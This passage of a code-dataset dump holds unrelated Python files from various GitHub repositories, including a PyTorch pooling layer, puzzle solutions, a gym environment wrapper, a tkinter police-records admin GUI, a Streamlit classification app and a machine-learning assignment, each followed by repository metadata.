subfolders=sub_list(gen_dir_new)\n gbest[gen_count-1]=list(ord_dict(vasp_energy(command, subfolders, xt_new, vt_new, int(cores))))[0]\n\n os.chdir(parent_dir)\n print (\"Best explored structure: {}\".format(conf_name))\n \n gen_count += 1\n\n #This is needed to compare the last gbest agains the last best\n #structure found in the last folder.\n\n print (\"##############################################\")\n last_comparison_gbest(parent_dir, [gbest[-1], conf_name])\n print (\"##############################################\")\n \n","repo_name":"alejandrosantanabonilla/PSO","sub_path":"pso/main/struct_search.py","file_name":"struct_search.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39438836109","text":"from torch import nn\nimport torch\n\nclass StatisticsPooling(nn.Module):\n \"\"\"This class implements a statistic pooling layer.\n It returns the concatenated mean and std of input tensor.\n Example\n -------\n >>> inp_tensor = torch.rand([5, 100, 50])\n >>> sp_layer = StatisticsPooling()\n >>> out_tensor = sp_layer(inp_tensor)\n >>> out_tensor.shape\n torch.Size([5, 1, 100])\n \"\"\"\n def __init__(self):\n super().__init__()\n # Small value for GaussNoise\n self.eps = 1e-5\n\n def forward(self, x, lengths=None):\n \"\"\"Calculates mean and std for a batch (input tensor).\n Arguments\n ---------\n x : torch.Tensor\n It represents a tensor for a mini-batch.\n \"\"\"\n if lengths is None:\n mean = x.mean(dim=1)\n std = x.std(dim=1)\n else:\n mean = []\n std = []\n for snt_id in 
range(x.shape[0]):\n # Avoiding padded time steps\n actual_size = int(torch.round(lengths[snt_id] * x.shape[1]))\n\n # computing statistics\n mean.append(\n torch.mean(x[snt_id, 1 : actual_size - 1, ...], dim=0)\n )\n std.append(\n torch.std(x[snt_id, 1 : actual_size - 1, ...], dim=0)\n )\n mean = torch.stack(mean)\n std = torch.stack(std)\n gnoise = self._get_gauss_noise(mean.size(), device=mean.device)\n gnoise = gnoise\n mean += gnoise\n std = std + self.eps\n # Append mean and std of the batch\n pooled_stats = torch.cat((mean, std), dim=1)\n pooled_stats = pooled_stats.unsqueeze(1)\n return pooled_stats\n\n def _get_gauss_noise(self, shape_of_tensor, device=\"cpu\"):\n \"\"\"Returns a tensor of epsilon Gaussian noise.\n Arguments\n ---------\n shape_of_tensor : tensor\n It represents the size of tensor for generating Gaussian noise.\n \"\"\"\n gnoise = torch.randn(shape_of_tensor, device=device)\n gnoise -= torch.min(gnoise)\n gnoise /= torch.max(gnoise)\n gnoise = self.eps * ((1 - 9) * gnoise + 9)\n return gnoise","repo_name":"tuannvhust/keywordspotting_using_deep_learning","sub_path":"nnet/pooling.py","file_name":"pooling.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"36667366677","text":"# 38:24\r\n\r\nimport json\r\nimport numpy as np\r\nfrom functools import lru_cache\r\n\r\n@lru_cache(maxsize=None)\r\ndef calculate_num_wins(player_positions=json.dumps([0, 0]), player_scores=json.dumps([0, 0]), to_play=0):\r\n player_positions = json.loads(player_positions)\r\n player_scores = json.loads(player_scores)\r\n if player_scores[0] >= 21:\r\n return np.array([1, 0])\r\n if player_scores[1] >= 21:\r\n return np.array([0, 1])\r\n\r\n res = np.array([0, 0])\r\n # These are the counts of the number of ways to get 3, 4, ..., 9 from 3 dice rolls\r\n for total_roll, combos in enumerate([1, 3, 6, 7, 6, 3, 1]):\r\n total_roll += 3\r\n player_positions_copy = list(player_positions)\r\n player_positions_copy[to_play] = ((player_positions_copy[to_play] + total_roll - 1) % 10) + 1\r\n\r\n player_scores_copy = list(player_scores)\r\n player_scores_copy[to_play] += player_positions_copy[to_play]\r\n\r\n res += combos * calculate_num_wins(player_positions=json.dumps(player_positions_copy), player_scores=json.dumps(player_scores_copy), to_play=1 - to_play)\r\n\r\n return res\r\n\r\nif __name__ == \"__main__\":\r\n f = open(\"./input.txt\", \"r\")\r\n input = f.read().splitlines()\r\n player_1_pos = int(input[0][-1])\r\n player_2_pos = int(input[1][-1])\r\n\r\n print(max(calculate_num_wins(player_positions=json.dumps([player_1_pos, player_2_pos]), player_scores=json.dumps([0, 0]), to_play=0)))\r\n","repo_name":"mattwedge/AdventOfCode","sub_path":"2021/day21/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11617968253","text":"N, M = map(int, input().split())\r\n\r\nS = []\r\nfor i in range(M):\r\n A = list(map(int, input().split()))\r\n S.append(set(A[1:]))\r\n\r\nused = set()\r\nstack = []\r\nans = int(1e9)\r\ndef BT():\r\n global ans\r\n global used\r\n\r\n if len(used) == N:\r\n ans = min(ans, len(stack))\r\n return\r\n\r\n if len(stack) > 0:\r\n s = stack[-1] + 1\r\n else:\r\n s = 0\r\n\r\n for i in range(s, M):\r\n stack.append(i)\r\n used = used.union(S[i])\r\n BT()\r\n stack.pop()\r\n used = set()\r\n for j in stack:\r\n used = 
used.union(S[j])\r\nBT()\r\nif ans == int(1e9):\r\n print(-1)\r\nelse:\r\n print(ans)","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/11578. 팀원 모집/팀원 모집.py","file_name":"팀원 모집.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41277354267","text":"import gym\nfrom gym import spaces\n\nfrom minatar import Environment\n\n\nclass BaseEnv(gym.Env):\n metadata = {'render.modes': ['human', 'rgb_array']}\n\n def __init__(self, game, display_time=50, use_minimal_action_set=False, **kwargs):\n self.game_name = game\n self.display_time = display_time\n self.game_kwargs = kwargs\n self.game = Environment(env_name=self.game_name, **kwargs)\n if use_minimal_action_set:\n self.action_set = self.game.minimal_action_set()\n else:\n self.action_set = list(range(self.game.num_actions()))\n self.action_space = spaces.Discrete(len(self.action_set))\n self.observation_space = spaces.Box(0.0, 1.0, shape=self.game.state_shape(), dtype=bool)\n\n def step(self, action):\n action = self.action_set[action]\n reward, done = self.game.act(action)\n return (self.game.state(), reward, done, {})\n \n def reset(self):\n self.game.reset()\n return self.game.state()\n \n def seed(self, seed=None):\n self.game = Environment(\n env_name=self.game_name,\n random_seed=seed,\n **self.game_kwargs\n )\n return seed\n\n def render(self, mode='human'):\n if mode == 'rgb_array':\n return self.game.state()\n elif mode == 'human':\n self.game.display_state(self.display_time)\n\n def close(self):\n if self.game.visualized:\n self.game.close_display()\n return 0","repo_name":"qlan3/gym-games","sub_path":"gym_minatar/envs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"37"} +{"seq_id":"17786668338","text":"from django import forms\n\nfrom aida.models.activity.workout import Workout\n\n\nclass WorkoutForm(forms.ModelForm):\n engaged_at = forms.DateTimeField(input_formats=[\"%Y-%m-%d %H:%M\"],\n widget=forms.DateTimeInput(format=\"%Y-%m-%d %H:%M\"))\n\n class Meta:\n model = Workout\n fields = (\"type\", \"engaged_at\")\n labels = {\n \"type\": \"Workout Type\",\n }\n\n def __init__(self, *args, **kwargs) -> None:\n super(WorkoutForm, self).__init__(*args, **kwargs)\n for key, field in self.fields.items():\n field.widget.attrs.update({\"class\": \"form-control\"})\n","repo_name":"neurothrone/project-aida","sub_path":"aida/forms/activity/workout.py","file_name":"workout.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10741243449","text":"\"\"\"\n287. Find the Duplicate Number\nGiven an array nums containing n + 1 integers whose values all lie between 1 and n (inclusive of 1 and n), at least one duplicate integer must exist.\n\nAssuming nums has only one duplicate integer, find this duplicate number.\n\nExample 1:\nInput: nums = [1,3,4,2,2]\nOutput: 2\n\nExample 2:\nInput: nums = [3,1,3,4,2]\nOutput: 3\n\nExample 3:\nInput: nums = [1,1]\nOutput: 1\n\nExample 4:\nInput: nums = [1,1,2]\nOutput: 1\n\nConstraints:\n2 <= n <= 3 * 10^4\nnums.length == n + 1\n1 <= nums[i] <= n\nOnly one integer in nums appears two or more times; every other integer appears exactly once.\n\nFollow-up:\nHow would you prove that at least one duplicate number exists in nums?\nCan you solve the problem without modifying the array nums?\nCan you solve it using only constant O(1) extra space?\nCan you design a solution with time complexity below O(n^2)?\n\nSource: LeetCode (力扣)\nLink: https://leetcode-cn.com/problems/find-the-duplicate-number\nCopyright belongs to LeetCode; commercial reprints require official authorization, and non-commercial reprints must credit the source.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def findDuplicate(self, nums: List[int]) -> int:\n slow, fast = 0, 0\n while True:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow
== fast:\n break\n root = 0\n while root != slow:\n root = nums[root]\n slow = nums[slow]\n return slow\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/287.find-the-duplicate-number.py","file_name":"287.find-the-duplicate-number.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70717848108","text":"# -*- coding: utf-8 -*-\r\n__author__ = 'Liu'\r\n\r\n\r\n# script, in_file, out_file = argv\r\n# pass the file names in via user input\r\nin_file = input(\"input>\")\r\nout_file = input(\"output>\")\r\n\r\n\r\ndef copy(*args):\r\n # assign the passed-in names to input and output\r\n input, output = args\r\n in_file = open(input)\r\n indata = in_file.read()\r\n out_file = open(output, 'w')\r\n out_file.write(indata)\r\n\r\n\r\ncopy(in_file, out_file)","repo_name":"Lxxyx/Learn-python-the-hard-way","sub_path":"上半部分/Day20 函数和文件/Day20 Test.py","file_name":"Day20 Test.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1785305559","text":"#\n# Template for code submission\n#\n# name :Davyd\n# email :dab254@pitt.edu\n# date :27.10.2016\n# class :CS0008-f2016\n# instructor : Max Novelli (man8@pitt.edu)\n#\n# Description:\n# The code for Assignment 2\n#\n# Notes:\n# Help, I need somebody Help, not just anybody\n#\n# START OF THE PROGRAMME AND ITS COMMENTARIES!!!\n#\n# Function(or Method as it doesn't return any value back) #1:\n# Making function for printKV\ndef printKV(key, value, klen = 0):\n # Finding the total key length\n kl = len(key)\n space = klen\n # Getting maximum space\n if (kl>klen):\n space = kl\n #Checking if value is an int\n if (isinstance(value, int)):\n # Printing int value and our pre-made string\n print('%-20s: %-10d' % (key, value))\n # Otherwise\n else:\n # Printing float number and our pre-made string\n print('%-20s: %-10.3f' % (key, value))\n#\n# Function #2:\n# Reading from file FO\ndef processFile(FO):\n # Total number of lines counter\n line_count = 0\n # Total distance run counter\n sum_total = 0\n # Opening file\n fp = open(FO, 'r')\n # For all lines in FO\n for line in fp:\n # Increasing line count\n line_count += 1\n # Removing '\\n'(new line) from the end of each line\n line = line.rstrip()\n # Splitting string and float to create a list\n st = line.split(',')\n # Finding sum_total\n sum_total += float(st[1])\n # returning data\n return line_count, sum_total\n#\n# Total sum (number of lines) of all files\nwhole_line = 0\n# Total sum (distance run) of all files\nwhole_sum = 0\n#\n# Making infinite loop (as we don't know the number of files which user will put in the programme)\nwhile(True):\n # Making a void line for beautification sake\n print(' ')\n # Getting file name (remember that files should be in repository in order for them to be used):\n FO = input('Please, enter file to be read:')\n # Checking if user wants to quit, as we don't know how many files were used\n if ((FO=='quit') or (FO=='q')):\n # Ending the infinite loop\n break\n # Processing the file:\n line_count, sum_total = processFile(FO)\n # Printing partial total sum of lines and partial distance run\n printKV('Partial Total # of lines', line_count)\n printKV('Partial distance run', sum_total)\n whole_line += line_count\n whole_sum += sum_total\n#\n# Making a void line for beautification sake\nprint(' ')\n# Printing total sum of lines and total distance run\nprint('Totals:')\nprintKV('Total # of lines', whole_line)\nprintKV('Total distance run',
whole_sum)\n","repo_name":"Seargent/CS0008-f2016","sub_path":"f2016_cs8_dab254_a2/f2016_cs8_dab254_a2.py","file_name":"f2016_cs8_dab254_a2.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13926044740","text":"def dfs(s, g):\n stack = [] # make an empty list to use as a stack\n visited = [False] * (V+1) # visited flags\n stack.append(s) # push the start node onto the stack.\n\n # loop until the stack is completely empty\n while stack:\n # pop from the stack and take it as the current node\n cur = stack.pop()\n # mark the current node as visited\n visited[cur] = True\n # look at the edges adjacent to the current node\n for w in range(1, V+1):\n # if it is adjacent but not yet visited\n if not visited[w] and arr[cur][w]:\n # it is reachable, so push it onto the stack\n stack.append(w)\n # reached the end point while traversing\n if visited[g]:\n # return 1\n return 1\n else:\n return 0\n\nT = int(input())\n\nfor tc in range(1, 1+T):\n V, E = map(int, input().split())\n arr = [[0] * (V + 1) for _ in range(V + 1)]\n\n for i in range(E):\n start, end = map(int, input().split())\n arr[start][end] = 1\n\n s, g = map(int, input().split())\n\n print(f'#{tc} {dfs(s, g)}')\n","repo_name":"seongbiny/algorithm","sub_path":"SWEA/4871_1.py","file_name":"4871_1.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43364180852","text":"import pixelhouse as ph\nimport numpy as np\nimport h5py\nimport os\nimport cv2\n\n# Light phantom, 20x on 0.1 gaussian blur, ~mask, MIXED_CLONE\n#f_image = \"data/source_images/obama-600x587.jpg\"\n#mask_dir = 'data/masks'\n\n#f_image = \"data/source_images/John_Cena_2012.jpg\"\n#f_image = \"data/source_images/emilia-clarke-no-makeup-blonde-brown-ftr.jpg\"\n\n#f_image = 'movies/000587.jpg'\nf_image = 'movies/000750.jpg'\nmask_dir = 'data/movie_mask/'\n\n\nf_h5 = os.path.join(mask_dir, os.path.basename(f_image))+'.h5'\n\nmask = None\nwith h5py.File(f_h5) as h5:\n for key in h5:\n if h5[key].attrs['label'] != 'person':\n continue\n\n #if h5[key].attrs['label'] == 'person':\n # continue\n\n if mask is None:\n mask = h5[key]['mask'][...]\n else:\n mask += h5[key]['mask'][...]\n\nC = ph.load(f_image)\nprint(C.shape, C.img.shape)\n\n\ndef pastebox(canvas, img, fmask, location):\n mask = np.zeros((*canvas.img.shape[:2], 3), canvas.img.dtype)\n mask[fmask] = [255]*3\n \n #mask[:,:] = [255,255,255]\n #canvas.img[fmask] = 0\n #print(loc)\n #print(canvas.shape)\n #canvas.show()\n #exit()\n\n print(mask.shape, canvas.img.shape, img.shape)\n\n canvas.img[:, :, :3] = cv2.seamlessClone(\n img[:, :, :3], canvas.img[:, :, :3], mask, tuple(location),\n #cv2.NORMAL_CLONE\n cv2.MIXED_CLONE\n #cv2.MONOCHROME_TRANSFER\n )\n\n\n#C.img[mask] = 155\n#C.show()\n#exit()\n\n\n\n#loc = C.shape[1]//2, C.shape[0]//2\nloc = C.shape[1]//2, C.shape[0]//2\n#mask[0,0] = True\n#mask[0,-1] = True\n#mask[-1,0] = True\n#mask[-1,-1] = True\n\nC.show()\norg = C.copy()\n\nfor i in range(2000):\n print(i)\n C2 = C.copy()\n C2 += ph.filters.gaussian_blur(0.1,0.1)\n\n #pastebox(C, C2.img, mask, loc)\n pastebox(C, C2.img, ~mask, loc)\n \n C.show()\n","repo_name":"thoppe/greasepaint","sub_path":"P4_mess_with_background.py","file_name":"P4_mess_with_background.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"35035653023","text":"import tkinter.font as tkFont\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\nimport os\r\nimport sqlite3\r\nimport datetime\r\nfrom del_user import test3\r\nfrom choose_user import *\r\nfrom
add_user import test5\r\nimport re\r\nfrom time import sleep\r\n\r\nimport tkinter.messagebox\r\nconnection = sqlite3.connect('NCD.db')\r\ncursor = connection.cursor()\r\n\r\n\r\ndef system_home(k):\r\n photoPath=''\r\n t2 = Tk()\r\n t2.configure(background='white')\r\n \r\n w, h = t2.winfo_screenwidth(), t2.winfo_screenheight()\r\n t2.geometry(\"%dx%d+0+0\" % (w, h))\r\n\r\n def add_user():\r\n t2.destroy()\r\n test5(k)\r\n\r\n def update_user():\r\n t2.destroy()\r\n test4(k)\r\n\r\n def delete_user():\r\n t2.destroy()\r\n test3(k)\r\n\r\n def logout():\r\n os.remove('sys'+pol_id+'.jpg')\r\n t2.destroy()\r\n b = str(datetime.datetime.now())\r\n cursor.execute(\"UPDATE POLICE set LASTLOGIN=? where POLICEID=?\", (b, k,))\r\n connection.commit()\r\n import subprocess\r\n subprocess.call(\"python login_page_first.py\")\r\n \r\n def last():\r\n q = cursor.execute(\"SELECT * FROM POLICE where POLICEID=?\", (k,))\r\n u = q.fetchall()\r\n s = u[0][6].split()\r\n tkinter.messagebox.showinfo('Last Login Details','Welcome ' + u[0][2] + '\\nLast Login Date: ' + s[0] + '\\nLast Login Time: ' + s[1])\r\n\r\n fil = tkFont.Font(family=\"Times New Roman\", size=22)\r\n v = StringVar(t2)\r\n\r\n name=Label(t2, text=\"S Y S T E M A D M I N I S T R A T O R\", fg='grey',font=tkFont.Font(family=\"Times New Roman\", size=40), borderwidth=2, relief=\"solid\")\r\n name.place(x=0, y=30, width=w, height=100)\r\n\r\n user_detail_1 = Label(t2, text='Name', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2,relief=\"solid\")\r\n user_detail_2 = Label(t2, text='Police ID', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2,relief=\"solid\")\r\n user_detail_3 = Label(t2, text='Date of Birth', font=tkFont.Font(family=\"Times New Roman\", size=18),borderwidth=2, relief=\"solid\")\r\n user_detail_4 = Label(t2, text='Email ID', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2,relief=\"solid\")\r\n user_detail_1.place(x=825, y=470, width=200, height=50)\r\n user_detail_2.place(x=825, y=540, width=200, height=50)\r\n user_detail_3.place(x=825, y=610, width=200, height=50)\r\n user_detail_4.place(x=825, y=680, width=200, height=50)\r\n\r\n v = StringVar(t2)\r\n add_user = Button(t2, text='ADD USER',font=fil, command=add_user, relief=\"raised\")\r\n update_user = Button(t2, text='EDIT USER',font=fil, command=update_user, relief=\"raised\")\r\n delete_user = Button(t2, text='DELETE USER',font=fil, command=delete_user, relief=\"raised\")\r\n logout_user = Button(t2, text='LOGOUT',font=fil, command=logout, relief=\"raised\")\r\n last_button = Button(t2, text='LAST LOGIN',font=fil, command=last, relief=\"raised\")\r\n \r\n x=cursor.execute(\"SELECT * FROM POLICE where POLICEID=?\", (k,))\r\n y=cursor.fetchall()\r\n\r\n for row in y:\r\n pol_id = row[0]\r\n photo = row[5]\r\n photoPath = \"sys\" + pol_id + \".jpg\"\r\n with open(photoPath, 'wb') as file:\r\n file.write(photo)\r\n\r\n t2.load11 = Image.open(photoPath)\r\n t2.load11 = t2.load11.resize((250, 250), Image.ANTIALIAS)\r\n t2.photo11 = ImageTk.PhotoImage(t2.load11, master=t2)\r\n t2.img11 = Label(t2, image=t2.photo11,borderwidth=2, relief=\"solid\")\r\n t2.img11.image = t2.photo11\r\n t2.img11.place(x=1025, y=190, width=250, height=250)\r\n\r\n add_user.place(x=170, y=200, width=400, height=80)\r\n delete_user.place(x=170, y=310, width=400, height=80)\r\n update_user.place(x=170, y=420, width=400, height=80)\r\n last_button.place(x=170, y=530, width=400, height=80)\r\n logout_user.place(x=170, y=640, width=400, 
height=80)\r\n\r\n cursor.execute(\"SELECT * FROM POLICE where POLICEID=?\", (k,))\r\n for row in cursor.fetchall():\r\n l_name = Label(t2, text=row[2].upper() + ' ' + row[3].upper() + ' ' + row[4].upper(), anchor='w', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2, relief=\"solid\")\r\n l_police_id = Label(t2, text=row[0], font=tkFont.Font(family=\"Times New Roman\", size=18), anchor='w', borderwidth=2,relief=\"solid\")\r\n l_dob = Label(t2, text=row[11], font=tkFont.Font(family=\"Times New Roman\", size=18), anchor='w', borderwidth=2,relief=\"solid\")\r\n l_email_id = Label(t2, text=row[7], font=tkFont.Font(family=\"Times New Roman\", size=18), anchor='w', borderwidth=2,relief=\"solid\")\r\n l_name.place(x=1050, y=470, width=400, height=50)\r\n l_police_id.place(x=1050, y=540, width=400, height=50)\r\n l_dob.place(x=1050, y=610, width=400, height=50)\r\n l_email_id.place(x=1050, y=680, width=400, height=50)\r\n t2.title('System Administrator - '+row[2] + ' ' + row[3]+ ' ' + row[4])\r\n\r\n mainloop()","repo_name":"rajpbora/Centralised-Criminal-Records-Management-System","sub_path":"sys_home.py","file_name":"sys_home.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7781232078","text":"# pip install streamlit\n# pip install numpy\n# pip install joblib\n# pip install openpyxl\n\n\n\n# from tkinter import X\nimport streamlit as st\nimport pandas as pd\nimport os\nimport pandas as pd\nimport MC_status\nimport MC_Graph\nimport model_predict\nimport glob\nimport openpyxl \nimport csv\n# from streamlitapp.Data_Input import data_input\n\n\ndef get_csv(df):\n \n csv = df.to_csv(index=False)\n \n return csv\ndef get_data1(dtfile):\n dtfile.to_csv (r'../Temp/temp.csv', index = False, header=True)\n\ndef form_callback():\n st.write(st.session_state.my_option)\n st.write(st.session_state.my_checkbox)\n\ndef listmodel(path):\n return os.listdir(path)\n\ndef listmachine(path):\n return os.listdir(path)\n\n\ndef st_header(data):\n st.title(\"Switch Gear Status Classification App\")\n \n with st.container():\n \n col1, col2, col3 = st.columns([1,10,1])\n \n with col2 :\n # st.markdown(\"{}\".format(str(word)))\n uploaded_file = st.file_uploader(\"Choose a A1-A16 file\")\n \n # st.markdown(\"{}\".format(str(word)))\n uploaded_file2 = st.file_uploader(\"Choose a A18-A31 file\")\n \n if uploaded_file is not None and uploaded_file2 is not None:\n import data_split\n data_split.Data_Split.split(uploaded_file)\n data_split.Data_Split.split(uploaded_file2)\n data = True\n \n # st.write(data.head())\n \n # get_data1(data)\n # st.table(data)\n # import Data_split\n # Data_split.data_input(data)\n return data\n\n\n\ndef st_body():\n lstmodel = listmodel(\"../model/\")\n \n tmp = [i.split('.')[0] for i in lstmodel]\n col1, col2, col3 = st.columns([1,10,1])\n with col2 :\n with st.form(key='my_form'):\n option = st.selectbox('Select Model:',tmp,key=\"my_option\")\n submitted = st.form_submit_button('selected model and predict')\n if submitted:\n st.write('You selected model: {}'.format(str(option)))\n return lstmodel[tmp.index(option)]\n \n\ndef st_result(clf):\n df = None\n if clf is not None:\n model_predict.get_predict_result.getResult(clf)\n # model = joblib.load(os.path.join(\"../model/\",clf))\n # z = model.predict(X)\n # res = pd.concat([data,pd.DataFrame(z,columns=['Status'])],axis=1)\n # col1, col2, col3 = st.columns([1,1,1])\n # with col2 :\n # st.download_button(\"Download 
Classification File\",get_csv(res),\"../output/result_app.csv\")\ndef download_results():\n \n files = [os.path.split(filename) for filename in glob.glob(\"../output/Predicted Results/*.csv\")]\n\n wb = openpyxl.Workbook()\n del wb[wb.sheetnames[0]] # Remove the default 'Sheet1'\n\n for f_path, f_name in files:\n (f_short_name, f_extension) = os.path.splitext(f_name)\n with open(os.path.join(f_path, f_name)) as f_input:\n ws = wb.create_sheet(title=os.path.basename(f_short_name))\n \n for row in csv.reader(f_input):\n ws.append(row)\n \n wb.save('../output/Predicted Results/Results.xlsx')\n\n with open('../output/Predicted Results/Results.xlsx', 'rb') as my_file:\n st.download_button(label = 'Download Results', data = my_file, file_name = 'Results.xlsx', mime = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet') \n\n\ndef status_body():\n status = MC_status.MC_status.st_status()\n return status\n\ndef summary_chart():\n st.header(\"Summary Chart\")\n chart_data = pd.DataFrame(\n MC_status.MC_status.sum_status(),\n columns=['Summary'],\n index=['Stage A', 'Stage B', 'Stage C','Stage D'])\n st.bar_chart(chart_data)\n\ndef history_chart():\n MC_Graph.mc_graph.get_mc_graph()\n\ndef main():\n with st.sidebar: \n data = None\n data = st_header(data)\n clf = st_body()\n if clf is not None and data is True:\n st_result(clf)\n download_results()\n else:\n st.write('Please upload files and select prediction model!')\n \n \n \n\n tab1, tab2 = st.tabs([\"Summary\", \"Details\"])\n with tab1:\n st.header(\"Summary\")\n status_body() \n summary_chart()\n with tab2:\n history_chart()\n \n\nmain()","repo_name":"mullermu/SWG-APP-Heroku","sub_path":"20221115_SWG Final/streamlitapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12898575026","text":"from pathlib import Path\nfrom typing import List, Dict\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom assignments.assignment1.a_load_file import read_dataset\nfrom assignments.assignment1.b_data_profile import get_column_mean\nfrom assignments.assignment1.c_data_cleaning import fix_nans\nfrom assignments.assignment1.d_data_encoding import generate_label_encoder, replace_with_label_encoder, \\\n generate_one_hot_encoder, replace_with_one_hot_encoder, fix_outliers, fix_nans, normalize_column\nfrom assignments.assignment1.e_experimentation import process_iris_dataset, process_amazon_video_game_dataset_again, \\\n process_life_expectancy_dataset\n\n\"\"\"\nClassification is a supervised form of machine learning. It uses labeled data, which is data with an expected\nresult available, and uses it to train a machine learning model to predict the said result. Classification\nfocuses on results of the categorical type.\n\"\"\"\n\n'''\nNOTE: I added some print statements to help looking at the functions output for testing\nI commented them out as they cause quite a lot of clutter while using them for larger functions\nBUT feel free to comment any of the print statements back in while testing if it helps :)\n'''\n\n\n##############################################\n# Example(s).
Read the comments in the following method(s)\n##############################################\ndef simple_random_forest_classifier(X: pd.DataFrame, y: pd.Series, set: str = None) -> Dict:\n \"\"\"\n Simple method to create and train a random forest classifier\n https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n # If necessary, change the n_estimators, max_depth and max_leaf_nodes in the below method to accelerate the model training,\n # but don't forget to comment why you did and any consequences of setting them!\n if set == 'Amazon':\n model = RandomForestClassifier(n_estimators=5)\n else:\n model = RandomForestClassifier()\n model.fit(X_train, y_train)\n y_predict = model.predict(X_test) # Use this line to get the prediction from the model\n accuracy = model.score(X_test, y_test)\n return dict(model=model, accuracy=accuracy, test_prediction=y_predict)\n\n\ndef simple_random_forest_on_iris() -> Dict:\n \"\"\"\n Here I will run a classification on the iris dataset with random forest\n \"\"\"\n df = pd.read_csv(Path('..', '..', 'iris.csv'))\n X, y = df.iloc[:, :4], df.iloc[:, 4]\n le = LabelEncoder()\n y_encoded = le.fit_transform(y)\n rf = simple_random_forest_classifier(X, y_encoded)\n\n print(rf['accuracy'])\n return rf\n\n\ndef reusing_code_random_forest_on_iris() -> Dict:\n \"\"\"\n Again I will run a classification on the iris dataset, but reusing\n the existing code from assignment1. Use this to check how different the results are (score and\n predictions).\n \"\"\"\n df = read_dataset(Path('..', '..', 'iris.csv'))\n for c in list(df.columns):\n # Notice that I am now passing though all columns.\n # If your code does not handle normalizing categorical columns, do so now (just return the unchanged column)\n df = fix_outliers(df, c)\n df = fix_nans(df, c)\n df[c] = normalize_column(df[c])\n\n X, y = df.iloc[:, :4], df.iloc[:, 4]\n le = generate_label_encoder(y)\n\n # Be careful to return a copy of the input with the changes, instead of changing inplace the inputs here!\n y_encoded = replace_with_label_encoder(y.to_frame(), column='species', le=le)\n rf = simple_random_forest_classifier(X, y_encoded['species'])\n\n '''\n !!Explanation!!\n Both the classifier in this function and the one in the last yield just about the same score on average\n I believe this is because the two datasets are essentially the same at this point:\n They both have label encoded classes\n The only difference is this function removed nans and outliers, which the dataset does not possess many of anyway\n And also normalizes the dataset, which from what my understanding might not actually change the values \n in relation to other values. This normalization may just make the model in this function more efficient!\n Due to this potential boost in efficiency due to normalization, I would choose this function's model over the last \n '''\n print(rf['accuracy'])\n return rf\n\n\n##############################################\n# Implement all the below methods\n# Don't install any other python package other than provided by python or in requirements.txt\n##############################################\ndef random_forest_iris_dataset_again() -> Dict:\n \"\"\"\n Run the result of the process iris again task of e_experimentation and discuss (1 sentence)\n the differences from the above results. 
Use the same random forest method.\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n\n df = process_iris_dataset()\n X, y = df.iloc[:, :5], df.iloc[:, 5:]\n rf = simple_random_forest_classifier(X, y)\n\n '''\n !!!Explanation!!!\n There are not too many differences present, as the datasets are the same.\n The datasets are quite balanced, and the train and test are properly split so we can rule out model \n over fitting for the most part.\n Although the labels are encoded in different ways, their meanings are not changed between models.\n The only notable difference is that the process_iris_dataset() classifier has a slightly lower score on average.\n I believe this is because the process_iris_dataset() has an additional numeric mean column. \n This may provide extra noise to the dataset, which results in the classifier being slightly worse!\n I think this adds noise as the mean of each column doesn't really provide any new information that may benefit\n this specific classification task.\n To combat this, I believe running some feature selection and decsriptive analysis on the dataset, and \n dropping a few of the less relevant columns may improve the model.\n A feature selection method that may prove useful here is the Pandas correlation function \"corr()\" - to find the \n strength of the correlation between each feature and the target label. \n '''\n print(rf['accuracy'])\n return rf\n\n\ndef decision_tree_classifier(X: pd.DataFrame, y: pd.Series) -> Dict:\n \"\"\"\n Reimplement the method \"simple_random_forest_classifier\" but using the technique we saw in class: decision trees\n (you can use sklearn 